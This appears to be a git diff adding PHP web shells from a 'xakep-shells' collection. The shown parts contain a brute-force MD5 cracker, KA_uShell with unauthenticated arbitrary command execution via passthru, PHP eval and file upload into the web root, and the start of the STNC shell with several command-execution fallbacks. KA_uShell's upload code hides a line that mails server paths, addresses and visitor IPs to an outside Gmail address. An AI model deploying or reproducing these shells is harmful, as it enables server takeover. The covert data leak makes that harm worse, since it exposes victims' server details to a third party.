+               date("d/m/Y H:i:s",$convert)."\n".
+               date("d-m-Y H:i:s",$convert)."\n".
+               date("d.m.Y H:i:s",$convert)."\n".
+             "---Month/Day/Year--\n".
+               date("m/d/Y H:i:s",$convert)."\n".
+               date("m-d-Y H:i:s",$convert)."\n".
+               date("m.d.Y H:i:s",$convert)."\n".
+             "---------SQL-------\n".
+               date("Y-m-d H:i:s",$convert)."\n".
+               date("Y m d H i s",$convert)."\n".
+               date("YmdHis",$convert);
+            break;
+
+         case 8:
+            $c=explode(" ",trim(preg_replace("! +!"," ",$convert)));
+            if (count($c)<3 || count($c)>6) $out="Bad value. Type: 2000 12 31 or 2000 12 31 12 59 59";
+            else {
+               if (empty($c[0])) $c[0]=1970;
+               if ($c[0]<50) $c[0]=2000+$c[0];
+               if ($c[0]>50 && $c[0]<100) $c[0]=1900+$c[0];
+               if (empty($c[1])) $c[1]=1;
+               if (empty($c[2])) $c[2]=1;
+               if (empty($c[3])) $c[3]=0;
+               if (empty($c[4])) $c[4]=0;
+               if (empty($c[5])) $c[5]=0;
+               $out="TIME: $c[0]-$c[1]-$c[2] $c[3]:$c[4]:$c[5]\nMKTIME: ".mktime($c[3],$c[4],$c[5],$c[1],$c[2],$c[0]);
+            }
+            break;
+
+         case 9:
+            $out=from_translit($convert);
+            break;
+
+         case 14:
+            $out=to_translit($convert);
+            break;
+
+         case 10: $out=convert_cyr_string($convert,'w','k'); break;
+         case 11: $out=convert_cyr_string($convert,'k','w'); break;
+         case 12: $out=convert_cyr_string($convert,'w','m'); break;
+         case 13: $out=convert_cyr_string($convert,'m','w'); break;
+         case 15: $out=convert_cyr_string($convert,'k','m'); break;
+         case 16: $out=convert_cyr_string($convert,'m','k'); break;
+
+         case 7:
+            echo "<script>top.location.href='$self?c=md5crack&text=$convert'</script>";
+            break;
+
+         case 0:
+            $out="Please select anythink function in list. Example: type 'test' and select 'md5'. Then click 'Submit'.";
+            break;
+
+         default: 
+            $out='Sorry, this function not work (try new versions)';
+      }
+      echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<pre><xmp>$out</xmp></pre>\n\n\n\n\n\n\n\n\n<hr size=1 noshade>";
+   }
+   
+   break;
+
+
+case "md5crack":
+
+   echo "<form action=$self name=main><input type=hidden name=c value=md5crack>
+   <h2>Decode MD5 (<a href=$self>home</a>|<a href=$self?c=t&name=1#convert>md5</a>)</h2><P>";
+
+   if (!isset($go)) {
+      if (!isset($fullqty)) $fullqty="";
+      if (!isset($fulltime)) $fulltime="";
+      if (!isset($php)) $php="";
+      if (!isset($from)) $from="";
+      echo "<b>STRING</b>: <input type=text name=text value='$text' size=40> (only 32 char: 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f)";
+      echo "<P><b>Range</b>: <input type=text name=php value=\"".htmlspecialchars($php)."\" size=90><br>";
+      $chars=array(
+      'a-z'=>"abcdefghijklmnopqrstuvwxyz",
+      'a-z,A-Z'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
+      'a-z,0-9'=>"abcdefghijklmnopqrstuvwxyz0123456789",
+      'a-z,A-Z,0-9'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
+      'a-z,A-Z,0-9,other'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~`!@#\$%^&*()_+-=[]{};:,<.>/\"'\\");
+      $i=0;
+      foreach ($chars as $k=>$v) {
+         echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\",$v))."\"</script>
+         <a href='' onclick=\"document.main.php.value=str$i;return false\">$k</a> &nbsp; ";
+         $i++;
+      }
+      echo "<P>
+      <b>Start from</b>: <input type=text size=70 name=from value='$from'><P>
+      <input type=hidden name=go value=1>
+      <input type=hidden name=fullqty value=$fullqty>
+      <input type=hidden name=fulltime value=$fulltime>
+      <input type=submit value='Start!'><form>";
+   }
+   else {
+
+      function mdgetword() {
+         global $php,$from,$word;
+         $word="";
+         for ($i=0; $i<count($from); $i++) $word.=$php[$from[$i]];
+      }
+
+      $fulltime=@intval($fulltime);
+      $fullqty=@intval($fullqty);
+
+      $text=strtolower($text);
+      if (!preg_match("!^[0-9a-f]{32}$!",$text)) exit("md5 bad format: must be 32 bytes, range 0-9,a,b,c,d,e,f");
+      if (!isset($php) || strlen($php)==0) $php="qwertyuiopasdfghjklzxcvbnm";
+      if (!isset($from) || !preg_match("!^([0-9]+):(([0-9]+,)*[0-9]+)$!",$from,$ok)) {
+         $pos=0;
+         $from=0;
+      }
+      else {
+         $pos=$ok[1];
+         $from=$ok[2];
+      }
+      $from=explode(",",$from);
+      if (!is_array($from) || !count($from) || count($from)==1 && $from[0]==0) { 
+         $from=array(0);
+         if (md5("")===$text) exit("** DONE **<br><br>md5('')=$text<br><br>(try empty string, 0 bytes!)");
+      }
+      $phplen=strlen($php);
+      mdgetword();
+      $poslen=strlen($word);
+      if ($pos<0 || $pos>=$poslen) $pos=0;
+
+      for ($i=0; $i<10; $i++) { echo "<!-- -->\r\n"; flush(); }
+
+      echo "<h3><a href='$self?c=md5crack".
+         "&from=".urlencode("$pos:".implode(",",$from)).
+         "&text=".urlencode($text).
+         "&php=".urlencode($php).
+         "&fulltime=$fulltime&fullqty=$fullqty".
+         "'>Save this link</a> - click for break and save current position</h3>";
+      flush();
+
+      echo "
+      MD5_HASH=$text<br>
+      CURRENT_WORD=$word<br>
+      CURRENT_DIGIT=$pos:".implode(",",$from)."<br>
+      RANGE=".htmlspecialchars($php)."<br>
+      ProcessTime=$fulltime sec (".(floor($fulltime/60/60))."h)<br>
+      Calculation(qty)={$fullqty}0000<p><font face=courier>";
+      flush();
+
+
+      $fullsum=pow($phplen,$poslen);
+      $time1=time();
+      $i=0;
+
+      while (1) {
+
+         $i++;
+         if ($i>50000) {
+            $time=time()-$time1;
+            if ($time>20) break;
+            $i=0;
+            $sum=0;
+            for ($j=1; $j<count($from); $j++) $sum+=$from[$j]*pow($phplen,$j);
+            printf("<nobr><b>%02.2f%%</b> ($word) %02dsec |</nobr> \r\n",
+               $sum*100/$fullsum,$time);
+            flush();
+            $fullqty+=5;
+         }
+
+         if (md5($word)===$text) 
+            exit("<P><font color=red size=+1><b>** DONE **<P><tt>[$word]=[$text]</tt></b></font>
+            <script> window.focus();  window.focus(); setTimeout(\"alert('Done!')\",100);</script>");
+         $from[$pos]++;
+         if ($from[$pos]==$phplen) {
+            $flag=1;
+            $from[$pos]=0;
+            $word[$pos]=$php[0];
+            for ($pos=$pos+1; $pos<$poslen; $pos++) {
+               if ($from[$pos]+1<$phplen) {
+                  $from[$pos]++;
+                  $word[$pos]=$php[$from[$pos]];
+                  $flag=0;
+                  $pos=0;
+                  break;
+               }
+               else {
+                  $from[$pos]=0;
+                  $word[$pos]=$php[0];
+               }
+            }
+            if ($flag) {
+               $from[]=0;
+               $poslen=count($from);
+               $word.=$php[0];
+               $pos=0;
+               $fullsum=pow($phplen,$poslen);
+            }
+         }
+         $word[$pos]=$php[$from[$pos]];
+      }
+
+      $fulltime+=time()-$time1;
+      if ($i>5000) $fullqty++;
+      $url="$self?c=md5crack".
+           "&from=".urlencode("$pos:".implode(",",$from)).
+           "&text=".urlencode($text).
+           "&php=".urlencode($php).
+           "&fulltime=$fulltime&fullqty=$fullqty&go=1";
+      echo "<script>location.href=\"$url\"</script><a href='$url'>click here</a>";
+
+   }
+
+   break;
+
+
+case "phpinfo":
+
+   phpinfo();
+   break;
+
+
+case "codes":
+
+   error_reporting(2039);
+   if (!isset($limit)) $limit=999;
+   if (!isset($fontsize)) $fontsize="300%";
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+   echo "<h3>".mm("Character map (symbol codes table)")."</h3>
+   <form action=$self method=get>
+   <input type=hidden name=c value=\"codes\">
+   <select name=fontname size=1>
+   <option value='Webdings'>====[ ".mm("Select font")." ]====";
+
+   foreach (array('Arial','Courier','Comic Sans MS','Fixedsys','Small fonts','Symbol',
+      'System','Tahoma','Terminal','Times New Roman','Verdana',
+      'Webdings','Wingdings','Wingdings 2','Wingdings 3') as $v)
+      echo "<option".($fontname==$v?" selected":"").">$v";
+   
+   echo "</select>
+   ".mm("or type other")." 
+   <input size=13 type=text name=fontname2 value=\"$fontname2\">.
+   ".mm("Font size").": <input size=6 type=text name=fontsize value=\"$fontsize\">.<br>
+   ".mm("Code limit").": 
+   <input type=radio name=limit value=255 id=a1 ".($limit==255?"checked":"")."><label for=a1>0-255</label>
+   <input type=radio name=limit value=999 id=a2 ".($limit==999?"checked":"")."><label for=a2>0-999 </label>
+   <input type=radio name=limit value=9999 id=a3 ".($limit==9999?"checked":"")."><label for=a3>0-9999</label>
+   <input type=submit value='".mm("Generate table")." !'></form><P>";
+
+   if (!isset($fontname)) break; 
+   if (!empty($fontname2)) $fontname=$fontname2;
+   echo "
+   <STYLE>
+   .codes { font: $fontsize $fontname; text-align: center; }
+   .z { font: 12pt Fixedsys; color: #cccccc; }
+   </STYLE>
+   <table class=codes border=0 cellspacing=0 cellpadding=1>";
+   ?>
+   <SCRIPT>
+   m=8;
+   n=1;
+   s=new String("");
+   s=s+"<tr><td class=z>&amp;#0000;</td><td>&nbsp;</td>";
+   for (i=1; i<=<?php echo $limit; ?>; i++) {
+      if (i<10) x="000"+i;
+      else if (i<100) x="00"+i;
+           else if (i<1000) x="0"+i;
+                else x=i;
+      if (n%m==0) s=s+"<tr>";
+      s=s+"<td class=z>&amp;#"+x+";</td>";
+      s=s+"<td>&#"+x+";</td>";
+      if (n%m+1==m) s=s+"</tr>";
+      if (s.length>500) {
+         document.write(s);
+         s=""
+      } 
+      n++;
+   }
+   document.write(s);
+   </SCRIPT>
+   <?php
+
+   echo "</table>";
+   break;
+
+
+
+case "img":
+
+   unset($img);
+$img=array(
+'dir'=>
+'R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.
+'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=',
+'fon'=>
+'R0lGODlhQAYEALMAAAAAAP///6bK8A4obRs2eSlFhDZTkEVjnVRyqWKCtnCQwXyezIiq1pO24J3A'.
+'6P///yH5BAEAAA8ALAAAAABABgQAAAT/cMhJq704E7n78EQXjmRpnmcRqizRsgUcz3Rt37QR63zR'.
+'GzygcEgsGo8HYNKQbDKfh2Z0Sq1ar9goQsvdeg/eMGJMLpvPaHRivG4j3O14Yk6v2+/4u2K+7yf8'.
+'Cn2Bg4SFhoeGC4GKjAqNC4yQkpOUlZaTDJCZmwubngygoaKjpKUNDKepqKipDa6vsLGysg4Ntbe2'.
+'tg63u72+v8AOArvDxcLFAsnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx'.
+'8vPSGfb3GCAfHBP6IvwgRKBIscJFwREvXMRYkVCGQhw1dPiYSJHiDx8SLwLBeKSjkyUg/5VAGRnl'.
+'CUkmWVKCWfmF5UqXX8bAZJmmJpubbt6QWaNzTs+ccOTkwbPnj9GjfIwCKspUqSBEiRxJnbpI6qNG'.
+'Vh1d2sopUydNYEF18tp1bClTq06JUqvK1aq0rGbNwvUKl11deIP9Mkasr7Fkwo4do0e4sOHDiBMr'.
+'Xsy4sePHkCNLnkzZHL7LmC9s2LdZ34eAAkOjUGGCNAyEBhkqfDiDNcTXGS1O7IFx9sYhHDuKRCIy'.
+'pBSSUqgAV7kFS/GXMcHIXK6cDEybOm+e4emzp/Wgdd7E0T50aNNAdADxeTroT3moVQspWrT+0dRI'.
+'k7Ju/VrJK/2ynsyG+nr2LSlVrMCVlsIsA8pVCyx05bJLXrzoFQxff0WITGUUVmjhhRhmqOGGHHbo'.
+'4YcgepPZiP3wA9A+nJ0o0GchsDjQiwaRFiNCL7R2Wo2vRZRDRbJpdJsQueWm2xImfdTbbkYKNwUU'.
+'KjXp0pPMJScGTdBVeZ10V2J3XXdEJaWUHUWZ9yV4ZDqFHnrrZVWVe5VYNZ8l9pF1H3/87ddVf6Oo'.
+'JSCAcMHSp1wGKujKXQsGo8uDvgwTWGCKKjMYYCFGKumklFZq6aWYZqrppstEAAA7',
+'mode'=>
+'R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO'.
+'2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/'.
+'dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=',
+
+'refresh'=>
+'R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA'.
+'AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY'.
+'3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ'.
+'R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=',
+'search'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//'.
+'/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap'.
+'s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD'.
+'AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr'.
+'Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==',
+'setup'=>
+'R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC'.
+'QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA'.
+'ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB'.
+'qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE'.
+'OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==',
+'up'=>
+'R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg'.
+'+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV'.
+'IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==',
+'sort_asc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa'.
+'SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==',
+'sort_desc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb'.
+'SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=',
+'exe'=>
+'R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7'.
+'WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt'.
+'xhIAOw==',
+'html'=>
+'R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz'.
+'c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P'.
+'KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk'.
+'Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR'.
+'ADs=',
+'txt'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ'.
+'SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7'.
+'UpPWG3Ig6Hq/XmRjuZwkAAA7',
+'unk'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANE'.
+'SLPcSzCqQKsVQ8JhexBBJnGVYFZACowleJZrRH7lFW8eDbMXaPO1juA2uXiGwBwFKRMeiTPlByrd'.
+'yUzYbJao6npVkQQAOw==',
+'php'=>
+'R0lGODlhEwAQALMAAAAAAP///9fX3d3f7s/S5F1qpmJpjKOqyr7D27i80K+ywEtam4OIk+T/AO7u'.
+'7v///yH5BAEAAA8ALAAAAAATABAAAAR08D0wK71VSna47yBHadxhnujRqKRJvC+SJIPKbgJR7DzP'.
+'NECNgNFbGI/HhmZQWASezugzsFBKdtJsoEA1aLBTJzTMIDWpRqr6mFgyounswiAgDYjY/FwxGD1K'.
+'BAMIg4MJCg41fiUpjAeKjY1+EwCUlZaVGhEAOw==',
+'img'=>
+'R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV'.
+'Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp'.
+'qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq'.
+'BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==',
+'edit'=>
+'R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze'.
+'EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61'.
+'LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==',
+'papki'=>
+'R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo'.
+'eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD'.
+'Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==',
+'home'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS'.
+'krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j'.
+'VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=',
+'back'=>
+'R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8'.
+'aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt'.
+'Wg0JADs='
+
+);
+
+
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   // /*
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+   // */
+   echo base64_decode($img[$name]);
+
+   break;
+
+}
+
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Russian.php.php.txt b/xakep-shells/PHP/Russian.php.php.txt
new file mode 100644
index 0000000..0560e51
--- /dev/null
+++ b/xakep-shells/PHP/Russian.php.php.txt
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåðâåð:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/STNC.php.php.txt b/xakep-shells/PHP/STNC.php.php.txt
new file mode 100644
index 0000000..3af836a
--- /dev/null
+++ b/xakep-shells/PHP/STNC.php.php.txt
@@ -0,0 +1,168 @@
+<?php
+$version = "0.8";
+$vsplit = "style=\"border-right: #000000 1px solid;\"";
+$hsplit = "style=\"border-bottom: #000000 1px solid;\"";
+error_reporting(0);
+
+if(version_compare(phpversion(),"4.1.0") == -1)
+{ $_POST=&$HTTP_POST_VARS; }
+if(get_magic_quotes_gpc())
+foreach ($_POST as $k=>$v)
+{ $_POST[$k] = stripslashes($v); }
+
+/*
+$login='root';
+$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
+
+if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
+{
+header("HTTP/1.0 401 Unauthorized");
+header("WWW-Authenticate: Basic");
+die();
+}
+*/
+
+function fe($s)
+{return function_exists($s);}
+function cmd($s)
+{if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
+elseif(fe("shell_exec"))$r=shell_exec($s);
+elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
+elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
+elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
+else $r=`$s`;return $r;}
+function safe_mode_is_on()
+{return ini_get('safe_mode');}
+function str100($s)
+{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
+function id()
+{return str100(cmd("id"));}
+function uname()
+{return str100(cmd("uname -a"));}
+
+function edit($size, $name, $val)
+{ return "<input type=text size=$size name=$name value=\"$val\">"; }
+function button($capt)
+{ return "<input class=\"btn\" type=submit value=\"$capt\">"; }
+function hidden($name, $val)
+{ return "<input type=hidden name=$name value=\"$val\">"; }
+function hidden_pwd()
+{ global $location; return hidden("pwd",$location);}
+
+$action_edit = false;
+
+$printline = "";
+
